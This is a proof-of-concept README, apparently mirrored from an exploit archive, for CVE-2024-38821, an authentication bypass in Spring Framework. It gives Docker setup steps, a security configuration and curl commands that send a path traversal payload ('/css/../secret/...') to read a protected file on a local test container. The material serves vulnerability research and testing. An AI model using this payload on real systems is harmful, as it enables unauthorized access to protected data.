关联漏洞
介绍
# CVE-2024-38821: Proof of Concept (PoC): Authentication Bypass in Spring Framework
This is a proof of concept for the [CVE-2024-38821](https://spring.io/security/cve-2024-38821) vulnerability
## Execution Steps
1. Build the Docker image (Spring Boot 3.3.4, based on Spring Framework 6.1.13)
```
cd vuln
docker build -t cve-2024-38821-poc .
```
2. Run the container and expose port 8080 to the host machine
```
docker run -d -p 8080:8080 --name cve-2024-38821-poc cve-2024-38821-poc
```
3. Run the following command to execute the PoC and confirm the vulnerability
```
curl -v --path-as-is "http://localhost:8080/secret/secret-file.txt" # Expected: 302 response (login required)
curl -v --path-as-is "http://localhost:8080/css/../secret/secret-file.txt" # Expected: 200 response (bypassed authentication)
```
If the attack is successful, the response will display: `This is a secret file.`
## Explanation
1. Create `SecurityConfig.java` to configure access permissions:
- Allow unauthenticated access to paths under /css/.
- Require authentication for paths under /secret/.
```java
public SecurityWebFilterChain securityWebFilterChain(ServerHttpSecurity http) {
return http
.authorizeExchange(exchange -> exchange
.pathMatchers("/css/**", "/").permitAll() // Static resources and the top page do not require authentication
.pathMatchers("/secret/**").authenticated() // Authentication is required for the "secret" path
.anyExchange().authenticated() // Authentication is required for all other paths
)
.formLogin().and() // Enable form-based authentication
.build();
}
```
3. Create the following payload. Since the payload starts with /css/, it matches the allowed path pattern. It does not start with /secret/, so it does not match the authentication-required path pattern:
- Path: `/css/../secret/secret-file.txt`
4. Use the following `curl` command to execute the PoC and verify if the attack is successful:
```
# Note: The --path-as-is option is required to send the request without URL normalization.
curl -v --path-as-is "http://localhost:8080/css/../secret/secret-file.txt"
```
If the attack is successful, the response will display: `This is a secret file.`
## Disclaimer
This PoC is provided for educational and security research purposes. Before using this in a real system, ensure the vulnerability has been fixed and you have proper authorization. The author takes no responsibility for any misuse of this code.
文件快照
[4.0K] /data/pocs/8dec030e406cf8f4363c05ddd879344ccad6f7e7
├── [1.0K] LICENSE
├── [2.6K] README.md
├── [4.0K] safe
│ ├── [ 580] build.gradle
│ ├── [ 512] Dockerfile
│ └── [4.0K] src
│ └── [4.0K] main
│ ├── [4.0K] java
│ │ └── [4.0K] com
│ │ └── [4.0K] example
│ │ └── [4.0K] demo
│ │ ├── [ 315] DemoApplication.java
│ │ └── [ 981] SecurityConfig.java
│ └── [4.0K] resources
│ ├── [4.0K] static
│ │ ├── [4.0K] css
│ │ │ └── [ 0] style.css
│ │ └── [4.0K] secret
│ │ └── [ 22] secret-file.txt
│ └── [4.0K] templates
│ ├── [ 123] index.html
│ └── [ 597] login.html
└── [4.0K] vuln
├── [ 580] build.gradle
├── [ 512] Dockerfile
└── [4.0K] src
└── [4.0K] main
├── [4.0K] java
│ └── [4.0K] com
│ └── [4.0K] example
│ └── [4.0K] demo
│ ├── [ 315] DemoApplication.java
│ └── [ 981] SecurityConfig.java
└── [4.0K] resources
├── [4.0K] static
│ ├── [4.0K] css
│ │ └── [ 0] style.css
│ └── [4.0K] secret
│ └── [ 22] secret-file.txt
└── [4.0K] templates
├── [ 123] index.html
└── [ 597] login.html
24 directories, 18 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。